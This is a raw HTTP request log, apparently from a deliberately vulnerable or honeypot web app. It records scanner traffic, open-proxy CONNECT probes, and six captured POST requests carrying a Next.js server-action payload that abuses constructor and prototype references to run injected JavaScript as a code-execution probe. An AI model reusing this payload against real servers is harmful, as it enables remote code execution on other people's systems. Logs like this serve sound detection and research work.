[2026-03-22 19:16:48] Main page accessed - IP: 146.190.134.221:43732
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/70.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 146.190.134.221:43732
Path: /
URL: /
Method: GET
[2026-03-22 19:16:48] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 147.185.132.180:63972
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-22 17:42:08] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:41906
Path: /jars
URL: /jars
Method: GET
[2026-03-22 17:21:02] === HTTP Request ===
===================
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive
Accept-Encoding: gzip, deflate, gzip, deflate
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:36910
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-22 16:44:01] === HTTP Request ===
[2026-03-22 16:40:45] Main page accessed - IP: 20.163.2.151:49552
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 20.163.2.151:49552
Path: /
URL: /
Method: GET
[2026-03-22 16:40:45] === HTTP Request ===
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Connection: close
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.142.154.47:32830
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-22 15:38:49] === HTTP Request ===
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Connection: close
Referer: http://95.143.191.38:8081
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.142.154.47:32778
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-22 15:38:48] === HTTP Request ===
[2026-03-22 15:38:48] Main page accessed - IP: 45.142.154.47:60938
===================
Connection: close
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.142.154.47:60938
Path: /
URL: /
Method: GET
[2026-03-22 15:38:48] === HTTP Request ===
[2026-03-22 15:38:47] Main page accessed - IP: 45.142.154.47:60838
===================
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.142.154.47:60838
Path: /
URL: /
Method: GET
[2026-03-22 15:38:47] === HTTP Request ===
[2026-03-22 15:17:09] Main page accessed - IP: 178.128.82.182:56484
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.128.82.182:56484
Path: /
URL: /
Method: GET
[2026-03-22 15:17:09] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.244.7
From: oai-searchbot(at)openai.com
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34488
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-22 13:20:02] === HTTP Request ===
[2026-03-22 11:52:59] Main page accessed - IP: 139.59.97.55:36524
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 139.59.97.55:36524
Path: /
URL: /
Method: GET
[2026-03-22 11:52:59] === HTTP Request ===
===================
------WebKitFormBoundaryx603786578695--
------WebKitFormBoundaryx603786578695
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx603786578695
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 95082+true+6350167;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx603786578695
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx603786578695
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 517
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
X-Nextjs-Html-Request-Id: ilovepoop_603786578695
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.121.84.57:48130
Path: /api/route
URL: /api/route
Method: POST
[2026-03-22 11:24:23] === HTTP Request ===
===================
------WebKitFormBoundaryx1183115991376--
------WebKitFormBoundaryx1183115991376
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1183115991376
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 204055+true+5798025;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1183115991376
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1183115991376
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1183115991376
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.121.84.57:48118
Path: /app
URL: /app
Method: POST
[2026-03-22 11:24:19] === HTTP Request ===
===================
------WebKitFormBoundaryx1596219853911--
------WebKitFormBoundaryx1596219853911
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1596219853911
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 288410+true+5534551;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1596219853911
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
X-Nextjs-Html-Request-Id: ilovepoop_1596219853911
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1596219853911
Next-Action: x
Connection: close
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.121.84.57:35624
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-22 11:24:16] === HTTP Request ===
===================
------WebKitFormBoundaryx547854319189--
------WebKitFormBoundaryx547854319189
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx547854319189
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 277652+true+1973169;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx547854319189
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx547854319189
Next-Action: x
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_547854319189
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.121.84.57:35612
Path: /api
URL: /api
Method: POST
[2026-03-22 11:24:13] === HTTP Request ===
===================
------WebKitFormBoundaryx880978655278--
------WebKitFormBoundaryx880978655278
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx880978655278
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 276717+true+3183681;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx880978655278
Next-Action: x
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx880978655278
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_880978655278
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.121.84.57:35610
Path: /_next
URL: /_next
Method: POST
[2026-03-22 11:24:09] === HTTP Request ===
[2026-03-22 11:24:08] Main page accessed - IP: 87.121.84.57:35604
===================
------WebKitFormBoundaryx136198252466--
------WebKitFormBoundaryx136198252466
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx136198252466
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 38005+true+3583693;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx136198252466
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_136198252466
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx136198252466
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.121.84.57:35604
Path: /
URL: /
Method: POST
[2026-03-22 11:24:08] === HTTP Request ===
[2026-03-22 11:12:49] Main page accessed - IP: 66.228.53.157:27462
===================
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.228.53.157:27462
Path: /
URL: /
Method: GET
[2026-03-22 11:12:49] === HTTP Request ===
[2026-03-22 10:47:14] Main page accessed - IP: 45.79.181.94:63700
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.79.181.94:63700
Path: /
URL: /
Method: GET
[2026-03-22 10:47:14] === HTTP Request ===
[2026-03-22 09:02:52] Main page accessed - IP: 52.180.156.198:52846
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 52.180.156.198:52846
Path: /
URL: /
Method: GET
[2026-03-22 09:02:52] === HTTP Request ===
[2026-03-22 08:05:31] Main page accessed - IP: 165.22.253.250:34492
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.22.253.250:34492
Path: /
URL: /
Method: GET
[2026-03-22 08:05:31] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 206.168.34.48:64452
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-22 06:45:44] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 206.168.34.48:64436
Path: *
URL: *
Method: PRI
[2026-03-22 06:45:43] === HTTP Request ===
[2026-03-22 06:45:43] Main page accessed - IP: 206.168.34.48:64424
===================
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 206.168.34.48:64424
Path: /
URL: /
Method: GET
[2026-03-22 06:45:43] === HTTP Request ===
[2026-03-22 06:34:36] Main page accessed - IP: 45.79.5.11:60658
===================
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 45.79.5.11:60658
Path: /
URL: /
Method: GET
[2026-03-22 06:34:36] === HTTP Request ===
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:28076
Path: /static/cabinet.js
URL: /static/cabinet.js
Method: GET
[2026-03-22 06:18:38] === HTTP Request ===
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:28102
Path: /static/goods.js
URL: /static/goods.js
Method: GET
[2026-03-22 06:18:38] === HTTP Request ===
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:28094
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-22 06:18:38] === HTTP Request ===
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:28056
Path: /static/salary.js
URL: /static/salary.js
Method: GET
[2026-03-22 06:18:38] === HTTP Request ===
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:28060
Path: /static/defects.js
URL: /static/defects.js
Method: GET
[2026-03-22 06:18:38] === HTTP Request ===
[2026-03-22 06:18:37] Cabinet page accessed - user_id: , IP: 64.181.211.198:28056
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:28056
Path: /cabinet
URL: /cabinet
Method: GET
[2026-03-22 06:18:37] === HTTP Request ===
[2026-03-22 06:18:37] Login page accessed - IP: 64.181.211.198:28102
===================
Accept: */*
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:28102
Path: /login
URL: /login
Method: GET
[2026-03-22 06:18:37] === HTTP Request ===
[2026-03-22 06:18:37] Goods page accessed - IP: 64.181.211.198:28076
===================
Accept: */*
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:28076
Path: /goods
URL: /goods
Method: GET
[2026-03-22 06:18:37] === HTTP Request ===
[2026-03-22 06:18:37] Defects page accessed - IP: 64.181.211.198:28060
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:28060
Path: /defects
URL: /defects
Method: GET
[2026-03-22 06:18:37] === HTTP Request ===
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:28104
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-22 06:18:37] === HTTP Request ===
[2026-03-22 06:18:37] Logs page accessed - IP: 64.181.211.198:28094
[2026-03-22 06:18:37] Salary page accessed - IP: 64.181.211.198:28084
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:28094
Path: /logs
URL: /logs
Method: GET
[2026-03-22 06:18:37] === HTTP Request ===
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:28084
Path: /salary
URL: /salary
Method: GET
[2026-03-22 06:18:37] === HTTP Request ===
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:28044
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-22 06:18:37] === HTTP Request ===
[2026-03-22 06:18:37] Main page accessed - IP: 64.181.211.198:28044
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:28044
Path: /
URL: /
Method: GET
[2026-03-22 06:18:37] === HTTP Request ===
[2026-03-22 06:18:37] Main page accessed - IP: 64.181.211.198:28032
===================
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Accept-Encoding: gzip,deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:28032
Path: /
URL: /
Method: HEAD
[2026-03-22 06:18:37] === HTTP Request ===
===================
Cache-Control: no-cache
Proxy-Connection: Keep-Alive
Pragma: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: www.shadowserver.org:443
RemoteAddr: 64.62.156.183:65313
Path:
URL: //www.shadowserver.org:443
Method: CONNECT
[2026-03-22 05:40:52] === HTTP Request ===
[2026-03-22 05:40:46] Main page accessed - IP: 64.62.156.188:23703
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: api.ipify.org
RemoteAddr: 64.62.156.188:23703
Query: format=json
Path: /
URL: http://api.ipify.org/?format=json
Method: GET
[2026-03-22 05:40:46] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.187:14619
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-22 05:39:59] === HTTP Request ===
[2026-03-22 05:39:13] Main page accessed - IP: 64.62.156.182:41786
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.182:41786
Path: /
URL: /
Method: GET
[2026-03-22 05:39:13] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.10:7227
RemoteAddr: 176.65.134.3:40854
Path:
URL: //185.65.245.10:7227
Method: CONNECT
[2026-03-22 05:15:22] === HTTP Request ===
[2026-03-22 04:33:30] Main page accessed - IP: 45.33.109.8:36182
===================
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 45.33.109.8:36182
Path: /
URL: /
Method: GET
[2026-03-22 04:33:30] === HTTP Request ===
===================
X-Forwarded-For: 66.132.172.209
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:43398
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-22 00:07:35] === HTTP Request ===
[2026-03-22 00:07:27] Main page accessed - IP: 172.30.0.12:43398
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 66.132.172.209
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:43398
Path: /
URL: /
Method: GET
[2026-03-22 00:07:27] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:54468
Path: /jars
URL: /jars
Method: GET
[2026-03-21 23:59:30] === HTTP Request ===
[2026-03-21 23:07:19] Main page accessed - IP: 178.128.82.182:47572
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.128.82.182:47572
Path: /
URL: /
Method: GET
[2026-03-21 23:07:19] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.172.185:45206
Path: /8v35xcv5l6rl7
URL: /8v35xcv5l6rl7
Method: GET
[2026-03-21 22:52:03] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.172.185:42962
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-21 22:51:58] === HTTP Request ===
[2026-03-21 22:51:52] Login page accessed - IP: 66.132.172.185:42960
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.172.185:42960
Path: /login
URL: /login
Method: GET
[2026-03-21 22:51:52] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.94.138.179:62528
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-21 22:50:02] === HTTP Request ===
[2026-03-21 22:49:58] Login page accessed - IP: 167.94.138.179:62520
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.94.138.179:62520
Path: /login
URL: /login
Method: GET
[2026-03-21 22:49:58] === HTTP Request ===
[2026-03-21 22:16:29] Main page accessed - IP: 205.210.31.36:61580
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 205.210.31.36:61580
Path: /
URL: /
Method: GET
[2026-03-21 22:16:29] === HTTP Request ===
[2026-03-21 21:38:20] Main page accessed - IP: 139.59.111.55:37448
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 139.59.111.55:37448
Path: /
URL: /
Method: GET
[2026-03-21 21:38:20] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.27:26628
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-21 20:43:58] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.27:26628
Path: /webpages/login.html
URL: /webpages/login.html
Method: GET
[2026-03-21 20:43:57] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.27:26628
Path: /web/
URL: /web/
Method: GET
[2026-03-21 20:43:57] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.27:26628
Path: /admin/login.asp
URL: /admin/login.asp
Method: GET
[2026-03-21 20:43:56] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.27:26628
Path: /remote/login
URL: /remote/login
Method: GET
[2026-03-21 20:43:55] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.27:26628
Path: /doc/index.html
URL: /doc/index.html
Method: GET
[2026-03-21 20:43:55] === HTTP Request ===
[2026-03-21 20:43:55] Login page accessed - IP: 216.180.246.27:26628
===================
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.27:26628
Path: /login
URL: /login
Method: GET
[2026-03-21 20:43:55] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.27:26628
Path: /login.jsp
URL: /login.jsp
Method: GET
[2026-03-21 20:43:54] === HTTP Request ===
===================
